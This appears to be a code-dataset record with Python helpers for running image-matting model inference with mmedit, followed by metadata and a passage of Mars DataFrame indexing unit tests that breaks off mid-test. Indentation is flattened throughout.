cfg = model.cfg
device = next(model.parameters()).device # model device
# remove alpha from test_pipeline
keys_to_remove = ['alpha', 'ori_alpha']
for key in keys_to_remove:
for pipeline in list(cfg.test_pipeline):
if 'key' in pipeline and key == pipeline['key']:
cfg.test_pipeline.remove(pipeline)
if 'keys' in pipeline and key in pipeline['keys']:
pipeline['keys'].remove(key)
if len(pipeline['keys']) == 0:
cfg.test_pipeline.remove(pipeline)
if 'meta_keys' in pipeline and key in pipeline['meta_keys']:
pipeline['meta_keys'].remove(key)
# build the data pipeline
test_pipeline = Compose(cfg.test_pipeline)
# prepare data
data = dict(merged_path=img, trimap_path=trimap)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
# forward the model
with torch.no_grad():
result = model(test_mode=True, **data)
return result['pred_alpha']
def matting_inference_file(model, img, trimap=None, mask=None, image_path="input file directly"):
"""Inference image(s) with the model.
Args:
model (nn.Module): The loaded model.
img (str): Image file path.
trimap (str): Trimap file path.
Returns:
np.ndarray: The predicted alpha matte.
"""
assert trimap is not None or mask is not None
cfg = model.cfg
device = next(model.parameters()).device # model device
# remove alpha from test_pipeline
keys_to_remove = ['alpha', 'ori_alpha']
for key in keys_to_remove:
for pipeline in list(cfg.test_pipeline):
if 'key' in pipeline and key == pipeline['key']:
cfg.test_pipeline.remove(pipeline)
if 'keys' in pipeline and key in pipeline['keys']:
pipeline['keys'].remove(key)
if len(pipeline['keys']) == 0:
cfg.test_pipeline.remove(pipeline)
if 'meta_keys' in pipeline and key in pipeline['meta_keys']:
pipeline['meta_keys'].remove(key)
# build the data pipeline
test_pipeline = cfg.test_pipeline[2:]
test_pipeline = Compose(test_pipeline)
# prepare data
data = dict(merged=img, mask=mask, ori_mask=mask,
trimap=trimap, ori_trimap=trimap, ori_merged=img.copy(),
merged_path=image_path, merged_ori_shape=img.shape)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
# forward the model
with torch.no_grad():
result = model(test_mode=True, **data)
return result
def fba_inference_seg(model, img, trimap, image_path="input file directly"):
"""Inference image(s) with the model.
Args:
model (nn.Module): The loaded model.
img (str): Image file path.
trimap (str): Trimap file path.
Returns:
np.ndarray: The predicted alpha matte.
"""
cfg = model.cfg
device = next(model.parameters()).device # model device
# remove alpha from test_pipeline
keys_to_remove = ['alpha', 'ori_alpha']
for key in keys_to_remove:
for pipeline in list(cfg.test_pipeline):
if 'key' in pipeline and key == pipeline['key']:
cfg.test_pipeline.remove(pipeline)
if 'keys' in pipeline and key in pipeline['keys']:
pipeline['keys'].remove(key)
if len(pipeline['keys']) == 0:
cfg.test_pipeline.remove(pipeline)
if 'meta_keys' in pipeline and key in pipeline['meta_keys']:
pipeline['meta_keys'].remove(key)
# build the data pipeline
test_pipeline = cfg.test_pipeline[2:]
test_pipeline = Compose(test_pipeline)
# prepare data
data = dict(merged=img, trimap=trimap, ori_trimap=trimap, ori_merged=img.copy(),
merged_path=image_path, merged_ori_shape=img.shape)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
# forward the model
with torch.no_grad():
result = model(test_mode=True, fg_flag=True, **data)
return result['pred_alpha'], result['pred_fg'], result['pred_bg']
def fba_inference(model, img, trimap):
"""Inference image(s) with the model.
Args:
model (nn.Module): The loaded model.
img (str): Image file path.
trimap (str): Trimap file path.
Returns:
np.ndarray: The predicted alpha matte.
"""
cfg = model.cfg
device = next(model.parameters()).device # model device
# remove alpha from test_pipeline
keys_to_remove = ['alpha', 'ori_alpha']
for key in keys_to_remove:
for pipeline in list(cfg.test_pipeline):
if 'key' in pipeline and key == pipeline['key']:
cfg.test_pipeline.remove(pipeline)
if 'keys' in pipeline and key in pipeline['keys']:
pipeline['keys'].remove(key)
if len(pipeline['keys']) == 0:
cfg.test_pipeline.remove(pipeline)
if 'meta_keys' in pipeline and key in pipeline['meta_keys']:
pipeline['meta_keys'].remove(key)
# build the data pipeline
test_pipeline = Compose(cfg.test_pipeline)
# prepare data
data = dict(merged_path=img, trimap_path=trimap)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
# forward the model
with torch.no_grad():
result = model(test_mode=True, fg_flag=True, **data)
return result['pred_alpha'], result['pred_fg'], result['pred_bg']
def indexfg_inference(model, img, trimap):
"""Inference image(s) with the model.
Args:
model (nn.Module): The loaded model.
img (str): Image file path.
trimap (str): Trimap file path.
Returns:
np.ndarray: The predicted alpha matte.
"""
cfg = model.cfg
device = next(model.parameters()).device # model device
# remove alpha from test_pipeline
keys_to_remove = ['alpha', 'ori_alpha']
for key in keys_to_remove:
for pipeline in list(cfg.test_pipeline):
if 'key' in pipeline and key == pipeline['key']:
cfg.test_pipeline.remove(pipeline)
if 'keys' in pipeline and key in pipeline['keys']:
pipeline['keys'].remove(key)
if len(pipeline['keys']) == 0:
cfg.test_pipeline.remove(pipeline)
if 'meta_keys' in pipeline and key in pipeline['meta_keys']:
pipeline['meta_keys'].remove(key)
# build the data pipeline
test_pipeline = Compose(cfg.test_pipeline)
# prepare data
data = dict(merged_path=img, trimap_path=trimap)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
# forward the model
with torch.no_grad():
result = model(test_mode=True, **data)
return result['pred_alpha'], result['pred_fg'] | 37.168831 | 97 | 0.626834 | import mmcv
import torch
from mmcv.parallel import collate, scatter
from mmcv.runner import load_checkpoint
from mmedit.datasets.pipelines import Compose
from mmedit.models import build_model
def init_model(config, checkpoint=None, device='cuda:0'):
if isinstance(config, str):
config = mmcv.Config.fromfile(config)
elif not isinstance(config, mmcv.Config):
raise TypeError('config must be a filename or Config object, '
f'but got {type(config)}')
config.model.pretrained = None
config.test_cfg.metrics = None
model = build_model(config.model, test_cfg=config.test_cfg)
if checkpoint is not None:
checkpoint = load_checkpoint(model, checkpoint)
model.cfg = config
model.to(device)
model.eval()
return model
def matting_inference(model, img, trimap):
cfg = model.cfg
device = next(model.parameters()).device
keys_to_remove = ['alpha', 'ori_alpha']
for key in keys_to_remove:
for pipeline in list(cfg.test_pipeline):
if 'key' in pipeline and key == pipeline['key']:
cfg.test_pipeline.remove(pipeline)
if 'keys' in pipeline and key in pipeline['keys']:
pipeline['keys'].remove(key)
if len(pipeline['keys']) == 0:
cfg.test_pipeline.remove(pipeline)
if 'meta_keys' in pipeline and key in pipeline['meta_keys']:
pipeline['meta_keys'].remove(key)
test_pipeline = Compose(cfg.test_pipeline)
data = dict(merged_path=img, trimap_path=trimap)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
with torch.no_grad():
result = model(test_mode=True, **data)
return result['pred_alpha']
def matting_inference_file(model, img, trimap=None, mask=None, image_path="input file directly"):
assert trimap is not None or mask is not None
cfg = model.cfg
device = next(model.parameters()).device
keys_to_remove = ['alpha', 'ori_alpha']
for key in keys_to_remove:
for pipeline in list(cfg.test_pipeline):
if 'key' in pipeline and key == pipeline['key']:
cfg.test_pipeline.remove(pipeline)
if 'keys' in pipeline and key in pipeline['keys']:
pipeline['keys'].remove(key)
if len(pipeline['keys']) == 0:
cfg.test_pipeline.remove(pipeline)
if 'meta_keys' in pipeline and key in pipeline['meta_keys']:
pipeline['meta_keys'].remove(key)
test_pipeline = cfg.test_pipeline[2:]
test_pipeline = Compose(test_pipeline)
data = dict(merged=img, mask=mask, ori_mask=mask,
trimap=trimap, ori_trimap=trimap, ori_merged=img.copy(),
merged_path=image_path, merged_ori_shape=img.shape)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
with torch.no_grad():
result = model(test_mode=True, **data)
return result
def fba_inference_seg(model, img, trimap, image_path="input file directly"):
cfg = model.cfg
device = next(model.parameters()).device
keys_to_remove = ['alpha', 'ori_alpha']
for key in keys_to_remove:
for pipeline in list(cfg.test_pipeline):
if 'key' in pipeline and key == pipeline['key']:
cfg.test_pipeline.remove(pipeline)
if 'keys' in pipeline and key in pipeline['keys']:
pipeline['keys'].remove(key)
if len(pipeline['keys']) == 0:
cfg.test_pipeline.remove(pipeline)
if 'meta_keys' in pipeline and key in pipeline['meta_keys']:
pipeline['meta_keys'].remove(key)
test_pipeline = cfg.test_pipeline[2:]
test_pipeline = Compose(test_pipeline)
data = dict(merged=img, trimap=trimap, ori_trimap=trimap, ori_merged=img.copy(),
merged_path=image_path, merged_ori_shape=img.shape)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
with torch.no_grad():
result = model(test_mode=True, fg_flag=True, **data)
return result['pred_alpha'], result['pred_fg'], result['pred_bg']
def fba_inference(model, img, trimap):
cfg = model.cfg
device = next(model.parameters()).device
keys_to_remove = ['alpha', 'ori_alpha']
for key in keys_to_remove:
for pipeline in list(cfg.test_pipeline):
if 'key' in pipeline and key == pipeline['key']:
cfg.test_pipeline.remove(pipeline)
if 'keys' in pipeline and key in pipeline['keys']:
pipeline['keys'].remove(key)
if len(pipeline['keys']) == 0:
cfg.test_pipeline.remove(pipeline)
if 'meta_keys' in pipeline and key in pipeline['meta_keys']:
pipeline['meta_keys'].remove(key)
test_pipeline = Compose(cfg.test_pipeline)
data = dict(merged_path=img, trimap_path=trimap)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
with torch.no_grad():
result = model(test_mode=True, fg_flag=True, **data)
return result['pred_alpha'], result['pred_fg'], result['pred_bg']
def indexfg_inference(model, img, trimap):
cfg = model.cfg
device = next(model.parameters()).device
keys_to_remove = ['alpha', 'ori_alpha']
for key in keys_to_remove:
for pipeline in list(cfg.test_pipeline):
if 'key' in pipeline and key == pipeline['key']:
cfg.test_pipeline.remove(pipeline)
if 'keys' in pipeline and key in pipeline['keys']:
pipeline['keys'].remove(key)
if len(pipeline['keys']) == 0:
cfg.test_pipeline.remove(pipeline)
if 'meta_keys' in pipeline and key in pipeline['meta_keys']:
pipeline['meta_keys'].remove(key)
test_pipeline = Compose(cfg.test_pipeline)
data = dict(merged_path=img, trimap_path=trimap)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
with torch.no_grad():
result = model(test_mode=True, **data)
return result['pred_alpha'], result['pred_fg'] | true | true |
1c2cb026677ecd7fe2cd08ad013b73f4da6d44cf | 34,995 | py | Python | mars/dataframe/indexing/tests/test_indexing.py | Focke-Wulf/mars | 7fbe1c7ef2f7e55455811ec511b68294546d04dc | [
"Apache-2.0"
] | 1 | 2020-11-05T05:53:00.000Z | 2020-11-05T05:53:00.000Z | mars/dataframe/indexing/tests/test_indexing.py | Focke-Wulf/mars | 7fbe1c7ef2f7e55455811ec511b68294546d04dc | [
"Apache-2.0"
] | null | null | null | mars/dataframe/indexing/tests/test_indexing.py | Focke-Wulf/mars | 7fbe1c7ef2f7e55455811ec511b68294546d04dc | [
"Apache-2.0"
] | null | null | null | # Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pandas as pd
import mars.dataframe as md
import mars.tensor as mt
from mars.tensor.core import TENSOR_CHUNK_TYPE, Tensor
from mars.tests.core import TestBase
from mars.dataframe.core import SERIES_CHUNK_TYPE, Series, DataFrame, DATAFRAME_CHUNK_TYPE
from mars.dataframe.indexing.iloc import DataFrameIlocGetItem, DataFrameIlocSetItem, \
IndexingError, HeadTailOptimizedOperandMixin
from mars.dataframe.indexing.loc import DataFrameLocGetItem
class Test(TestBase):
def testSetIndex(self):
df1 = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
df2 = md.DataFrame(df1, chunk_size=2)
df3 = df2.set_index('y', drop=True)
df3 = df3.tiles()
self.assertEqual(df3.chunk_shape, (2, 2))
pd.testing.assert_index_equal(df3.chunks[0].columns_value.to_pandas(), pd.Index(['x']))
pd.testing.assert_index_equal(df3.chunks[1].columns_value.to_pandas(), pd.Index(['z']))
df4 = df2.set_index('y', drop=False)
df4 = df4.tiles()
self.assertEqual(df4.chunk_shape, (2, 2))
pd.testing.assert_index_equal(df4.chunks[0].columns_value.to_pandas(), pd.Index(['x', 'y']))
pd.testing.assert_index_equal(df4.chunks[1].columns_value.to_pandas(), pd.Index(['z']))
def testILocGetItem(self):
df1 = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
df2 = md.DataFrame(df1, chunk_size=2)
with self.assertRaises(IndexingError):
_ = df2.iloc[1, 1, 1]
# index cannot be tuple
with self.assertRaises(IndexingError):
_ = df2.iloc[(1,), ]
# index wrong type
with self.assertRaises(TypeError):
_ = df2.iloc['a1':]
with self.assertRaises(NotImplementedError):
_ = df2.iloc[0, md.Series(['a2', 'a3'])]
# fancy index should be 1-d
with self.assertRaises(ValueError):
_ = df2.iloc[[[0, 1], [1, 2]]]
with self.assertRaises(ValueError):
_ = df2.iloc[1, ...]
with self.assertRaises(IndexError):
_ = df2.iloc[-4]
with self.assertRaises(IndexError):
_ = df2.iloc[3]
# plain index
df3 = df2.iloc[1]
df3 = df3.tiles()
self.assertIsInstance(df3, Series)
self.assertIsInstance(df3.op, DataFrameIlocGetItem)
self.assertEqual(df3.shape, (3,))
self.assertEqual(df3.chunk_shape, (2,))
self.assertEqual(df3.chunks[0].shape, (2,))
self.assertEqual(df3.chunks[1].shape, (1,))
self.assertEqual(df3.chunks[0].op.indexes, (1, slice(None, None, None)))
self.assertEqual(df3.chunks[1].op.indexes, (1, slice(None, None, None)))
self.assertEqual(df3.chunks[0].inputs[0].index, (0, 0))
self.assertEqual(df3.chunks[0].inputs[0].shape, (2, 2))
self.assertEqual(df3.chunks[1].inputs[0].index, (0, 1))
self.assertEqual(df3.chunks[1].inputs[0].shape, (2, 1))
# slice index
df4 = df2.iloc[:, 2:4]
df4 = df4.tiles()
self.assertIsInstance(df4, DataFrame)
self.assertIsInstance(df4.op, DataFrameIlocGetItem)
self.assertEqual(df4.shape, (3, 1))
self.assertEqual(df4.chunk_shape, (2, 1))
self.assertEqual(df4.chunks[0].shape, (2, 1))
pd.testing.assert_index_equal(df4.chunks[0].columns_value.to_pandas(), df1.columns[2:3])
pd.testing.assert_series_equal(df4.chunks[0].dtypes, df1.dtypes[2:3])
self.assertIsInstance(df4.chunks[0].index_value.to_pandas(), type(df1.index))
self.assertEqual(df4.chunks[1].shape, (1, 1))
pd.testing.assert_index_equal(df4.chunks[1].columns_value.to_pandas(), df1.columns[2:3])
pd.testing.assert_series_equal(df4.chunks[1].dtypes, df1.dtypes[2:3])
self.assertNotEqual(df4.chunks[0].index_value.key, df4.chunks[1].index_value.key)
self.assertIsInstance(df4.chunks[1].index_value.to_pandas(), type(df1.index))
self.assertEqual(df4.chunks[0].op.indexes, (slice(None, None, None), slice(None, None, None)))
self.assertEqual(df4.chunks[1].op.indexes, (slice(None, None, None), slice(None, None, None)))
self.assertEqual(df4.chunks[0].inputs[0].index, (0, 1))
self.assertEqual(df4.chunks[0].inputs[0].shape, (2, 1))
self.assertEqual(df4.chunks[1].inputs[0].index, (1, 1))
self.assertEqual(df4.chunks[1].inputs[0].shape, (1, 1))
# plain fancy index
df5 = df2.iloc[[0], [0, 1, 2]]
df5 = df5.tiles()
self.assertIsInstance(df5, DataFrame)
self.assertIsInstance(df5.op, DataFrameIlocGetItem)
self.assertEqual(df5.shape, (1, 3))
self.assertEqual(df5.chunk_shape, (1, 2))
self.assertEqual(df5.chunks[0].shape, (1, 2))
pd.testing.assert_index_equal(df5.chunks[0].columns_value.to_pandas(), df1.columns[:2])
pd.testing.assert_series_equal(df5.chunks[0].dtypes, df1.dtypes[:2])
self.assertIsInstance(df5.chunks[0].index_value.to_pandas(), type(df1.index))
self.assertEqual(df5.chunks[1].shape, (1, 1))
pd.testing.assert_index_equal(df5.chunks[1].columns_value.to_pandas(), df1.columns[2:])
pd.testing.assert_series_equal(df5.chunks[1].dtypes, df1.dtypes[2:])
self.assertIsInstance(df5.chunks[1].index_value.to_pandas(), type(df1.index))
np.testing.assert_array_equal(df5.chunks[0].op.indexes[0], [0])
np.testing.assert_array_equal(df5.chunks[0].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df5.chunks[1].op.indexes[0], [0])
np.testing.assert_array_equal(df5.chunks[1].op.indexes[1], [0])
self.assertEqual(df5.chunks[0].inputs[0].index, (0, 0))
self.assertEqual(df5.chunks[0].inputs[0].shape, (2, 2))
self.assertEqual(df5.chunks[1].inputs[0].index, (0, 1))
self.assertEqual(df5.chunks[1].inputs[0].shape, (2, 1))
# fancy index
df6 = df2.iloc[[1, 2], [0, 1, 2]]
df6 = df6.tiles()
self.assertIsInstance(df6, DataFrame)
self.assertIsInstance(df6.op, DataFrameIlocGetItem)
self.assertEqual(df6.shape, (2, 3))
self.assertEqual(df6.chunk_shape, (2, 2))
self.assertEqual(df6.chunks[0].shape, (1, 2))
self.assertEqual(df6.chunks[1].shape, (1, 1))
self.assertEqual(df6.chunks[2].shape, (1, 2))
self.assertEqual(df6.chunks[3].shape, (1, 1))
np.testing.assert_array_equal(df6.chunks[0].op.indexes[0], [1])
np.testing.assert_array_equal(df6.chunks[0].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df6.chunks[1].op.indexes[0], [1])
np.testing.assert_array_equal(df6.chunks[1].op.indexes[1], [0])
np.testing.assert_array_equal(df6.chunks[2].op.indexes[0], [0])
np.testing.assert_array_equal(df6.chunks[2].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df6.chunks[3].op.indexes[0], [0])
np.testing.assert_array_equal(df6.chunks[3].op.indexes[1], [0])
self.assertEqual(df6.chunks[0].inputs[0].index, (0, 0))
self.assertEqual(df6.chunks[0].inputs[0].shape, (2, 2))
self.assertEqual(df6.chunks[1].inputs[0].index, (0, 1))
self.assertEqual(df6.chunks[1].inputs[0].shape, (2, 1))
self.assertEqual(df6.chunks[2].inputs[0].index, (1, 0))
self.assertEqual(df6.chunks[2].inputs[0].shape, (1, 2))
self.assertEqual(df6.chunks[3].inputs[0].index, (1, 1))
self.assertEqual(df6.chunks[3].inputs[0].shape, (1, 1))
# plain index
df7 = df2.iloc[1, 2]
df7 = df7.tiles()
self.assertIsInstance(df7, Tensor) # scalar
self.assertIsInstance(df7.op, DataFrameIlocGetItem)
self.assertEqual(df7.shape, ())
self.assertEqual(df7.chunk_shape, ())
self.assertEqual(df7.chunks[0].dtype, df7.dtype)
self.assertEqual(df7.chunks[0].shape, ())
self.assertEqual(df7.chunks[0].op.indexes, (1, 0))
self.assertEqual(df7.chunks[0].inputs[0].index, (0, 1))
self.assertEqual(df7.chunks[0].inputs[0].shape, (2, 1))
# test Series iloc getitem
# slice
series = md.Series(pd.Series(np.arange(10)), chunk_size=3).iloc[4:8]
series = series.tiles()
self.assertEqual(series.shape, (4,))
self.assertEqual(len(series.chunks), 2)
self.assertEqual(series.chunks[0].shape, (2,))
self.assertEqual(series.chunks[0].index, (0,))
self.assertEqual(series.chunks[0].op.indexes, (slice(1, 3, 1),))
self.assertEqual(series.chunks[1].shape, (2,))
self.assertEqual(series.chunks[1].op.indexes, (slice(0, 2, 1),))
self.assertEqual(series.chunks[1].index, (1,))
# fancy index
series = md.Series(pd.Series(np.arange(10)), chunk_size=3).iloc[[2, 4, 8]]
series = series.tiles()
self.assertEqual(series.shape, (3,))
self.assertEqual(len(series.chunks), 3)
self.assertEqual(series.chunks[0].shape, (1,))
self.assertEqual(series.chunks[0].index, (0,))
self.assertEqual(series.chunks[0].op.indexes[0], [2])
self.assertEqual(series.chunks[1].shape, (1,))
self.assertEqual(series.chunks[1].op.indexes[0], [1])
self.assertEqual(series.chunks[1].index, (1,))
self.assertEqual(series.chunks[2].shape, (1,))
self.assertEqual(series.chunks[2].op.indexes[0], [2])
self.assertEqual(series.chunks[2].index, (2,))
def testILocSetItem(self):
df1 = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
df2 = md.DataFrame(df1, chunk_size=2)
df2 = df2.tiles()
# plain index
df3 = md.DataFrame(df1, chunk_size=2)
df3.iloc[1] = 100
df3 = df3.tiles()
self.assertIsInstance(df3.op, DataFrameIlocSetItem)
self.assertEqual(df3.chunk_shape, df2.chunk_shape)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df3.index_value.to_pandas())
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df3.columns_value.to_pandas())
for c1, c2 in zip(df2.chunks, df3.chunks):
self.assertEqual(c1.shape, c2.shape)
pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
if isinstance(c2.op, DataFrameIlocSetItem):
self.assertEqual(c1.key, c2.inputs[0].key)
else:
self.assertEqual(c1.key, c2.key)
self.assertEqual(df3.chunks[0].op.indexes, (1, slice(None, None, None)))
self.assertEqual(df3.chunks[1].op.indexes, (1, slice(None, None, None)))
# # slice index
df4 = md.DataFrame(df1, chunk_size=2)
df4.iloc[:, 2:4] = 1111
df4 = df4.tiles()
self.assertIsInstance(df4.op, DataFrameIlocSetItem)
self.assertEqual(df4.chunk_shape, df2.chunk_shape)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df4.index_value.to_pandas())
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df4.columns_value.to_pandas())
for c1, c2 in zip(df2.chunks, df4.chunks):
self.assertEqual(c1.shape, c2.shape)
pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
if isinstance(c2.op, DataFrameIlocSetItem):
self.assertEqual(c1.key, c2.inputs[0].key)
else:
self.assertEqual(c1.key, c2.key)
self.assertEqual(df4.chunks[1].op.indexes, (slice(None, None, None), slice(None, None, None)))
self.assertEqual(df4.chunks[3].op.indexes, (slice(None, None, None), slice(None, None, None)))
# plain fancy index
df5 = md.DataFrame(df1, chunk_size=2)
df5.iloc[[0], [0, 1, 2]] = 2222
df5 = df5.tiles()
self.assertIsInstance(df5.op, DataFrameIlocSetItem)
self.assertEqual(df5.chunk_shape, df2.chunk_shape)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df5.index_value.to_pandas())
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df5.columns_value.to_pandas())
for c1, c2 in zip(df2.chunks, df5.chunks):
self.assertEqual(c1.shape, c2.shape)
pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
if isinstance(c2.op, DataFrameIlocSetItem):
self.assertEqual(c1.key, c2.inputs[0].key)
else:
self.assertEqual(c1.key, c2.key)
np.testing.assert_array_equal(df5.chunks[0].op.indexes[0], [0])
np.testing.assert_array_equal(df5.chunks[0].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df5.chunks[1].op.indexes[0], [0])
np.testing.assert_array_equal(df5.chunks[1].op.indexes[1], [0])
# fancy index
df6 = md.DataFrame(df1, chunk_size=2)
df6.iloc[[1, 2], [0, 1, 2]] = 3333
df6 = df6.tiles()
self.assertIsInstance(df6.op, DataFrameIlocSetItem)
self.assertEqual(df6.chunk_shape, df2.chunk_shape)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df6.index_value.to_pandas())
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df6.columns_value.to_pandas())
for c1, c2 in zip(df2.chunks, df6.chunks):
self.assertEqual(c1.shape, c2.shape)
pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
if isinstance(c2.op, DataFrameIlocSetItem):
self.assertEqual(c1.key, c2.inputs[0].key)
else:
self.assertEqual(c1.key, c2.key)
np.testing.assert_array_equal(df6.chunks[0].op.indexes[0], [1])
np.testing.assert_array_equal(df6.chunks[0].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df6.chunks[1].op.indexes[0], [1])
np.testing.assert_array_equal(df6.chunks[1].op.indexes[1], [0])
np.testing.assert_array_equal(df6.chunks[2].op.indexes[0], [0])
np.testing.assert_array_equal(df6.chunks[2].op.indexes[1], [0, 1])
np.testing.assert_array_equal(df6.chunks[3].op.indexes[0], [0])
np.testing.assert_array_equal(df6.chunks[3].op.indexes[1], [0])
# plain index
df7 = md.DataFrame(df1, chunk_size=2)
df7.iloc[1, 2] = 4444
df7 = df7.tiles()
self.assertIsInstance(df7.op, DataFrameIlocSetItem)
self.assertEqual(df7.chunk_shape, df2.chunk_shape)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df7.index_value.to_pandas())
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), df7.columns_value.to_pandas())
for c1, c2 in zip(df2.chunks, df7.chunks):
self.assertEqual(c1.shape, c2.shape)
pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
if isinstance(c2.op, DataFrameIlocSetItem):
self.assertEqual(c1.key, c2.inputs[0].key)
else:
self.assertEqual(c1.key, c2.key)
self.assertEqual(df7.chunks[1].op.indexes, (1, 0))
# test Series
# slice
series = md.Series(pd.Series(np.arange(10)), chunk_size=3)
series.iloc[:4] = 2
series = series.tiles()
self.assertEqual(series.shape, (10,))
self.assertEqual(len(series.chunks), 4)
self.assertEqual(series.chunks[0].op.indexes, [slice(None, None, None), ])
self.assertEqual(series.chunks[0].op.value, 2)
self.assertEqual(series.chunks[1].op.indexes, [slice(0, 1, 1), ])
self.assertEqual(series.chunks[1].op.value, 2)
# fancy index
series = md.Series(pd.Series(np.arange(10)), chunk_size=3)
series.iloc[[2, 4, 9]] = 3
series = series.tiles()
self.assertEqual(series.shape, (10,))
self.assertEqual(len(series.chunks), 4)
self.assertEqual(series.chunks[0].index, (0,))
self.assertEqual(series.chunks[0].op.indexes[0].tolist(), [2])
self.assertEqual(series.chunks[0].op.value, 3)
self.assertEqual(series.chunks[1].index, (1,))
self.assertEqual(series.chunks[1].op.indexes[0].tolist(), [1])
self.assertEqual(series.chunks[1].op.value, 3)
self.assertEqual(series.chunks[3].index, (3,))
self.assertEqual(series.chunks[3].op.indexes[0].tolist(), [0])
self.assertEqual(series.chunks[3].op.value, 3)
def testDataFrameLoc(self):
raw = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
df = md.DataFrame(raw, chunk_size=2)
raw2 = raw.copy()
raw2.reset_index(inplace=True, drop=True)
df3 = md.DataFrame(raw2, chunk_size=2)
s = pd.Series([1, 3, 5], index=['a1', 'a2', 'a3'])
series = md.Series(s, chunk_size=2)
# test return scalar
df2 = df.loc['a1', 'z']
self.assertIsInstance(df2, Tensor)
self.assertEqual(df2.shape, ())
self.assertEqual(df2.dtype, raw['z'].dtype)
df2 = df2.tiles()
self.assertEqual(len(df2.chunks), 1)
self.assertIsInstance(df2.chunks[0], TENSOR_CHUNK_TYPE)
# test return series for index axis
df2 = df.loc[:, 'y']
self.assertIsInstance(df2, Series)
self.assertEqual(df2.shape, (3,))
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
self.assertEqual(df2.name, 'y')
df2 = df2.tiles()
self.assertEqual(len(df2.chunks), 2)
for c in df2.chunks:
self.assertIsInstance(c, SERIES_CHUNK_TYPE)
self.assertIsInstance(c.index_value.to_pandas(), type(raw.index))
self.assertEqual(c.name, 'y')
self.assertEqual(c.dtype, raw['y'].dtype)
# test return series for column axis
df2 = df.loc['a2', :]
self.assertIsInstance(df2, Series)
self.assertEqual(df2.shape, (3,))
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.columns_value.to_pandas())
self.assertEqual(df2.name, 'a2')
df2 = df2.tiles()
self.assertEqual(len(df2.chunks), 2)
for c in df2.chunks:
self.assertIsInstance(c, SERIES_CHUNK_TYPE)
self.assertIsInstance(c.index_value.to_pandas(), type(raw.columns))
self.assertEqual(c.name, 'a2')
self.assertEqual(c.dtype, raw.loc['a2'].dtype)
# test slice
df2 = df.loc['a2': 'a3', 'y': 'z']
self.assertIsInstance(df2, DataFrame)
self.assertEqual(df2.shape, (np.nan, 2))
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
self.assertNotEqual(df2.index_value.key, df.index_value.key)
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.loc[:, 'y': 'z'].columns)
pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, 'y': 'z'].dtypes)
# test fancy index on index axis
df2 = df.loc[['a3', 'a2'], [True, False, True]]
self.assertIsInstance(df2, DataFrame)
self.assertEqual(df2.shape, (2, 2))
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
self.assertNotEqual(df2.index_value.key, df.index_value.key)
pd.testing.assert_index_equal(df2.columns_value.to_pandas(),
raw.loc[:, [True, False, True]].columns)
pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, [True, False, True]].dtypes)
# test fancy index which is md.Series on index axis
df2 = df.loc[md.Series(['a3', 'a2']), [True, False, True]]
self.assertIsInstance(df2, DataFrame)
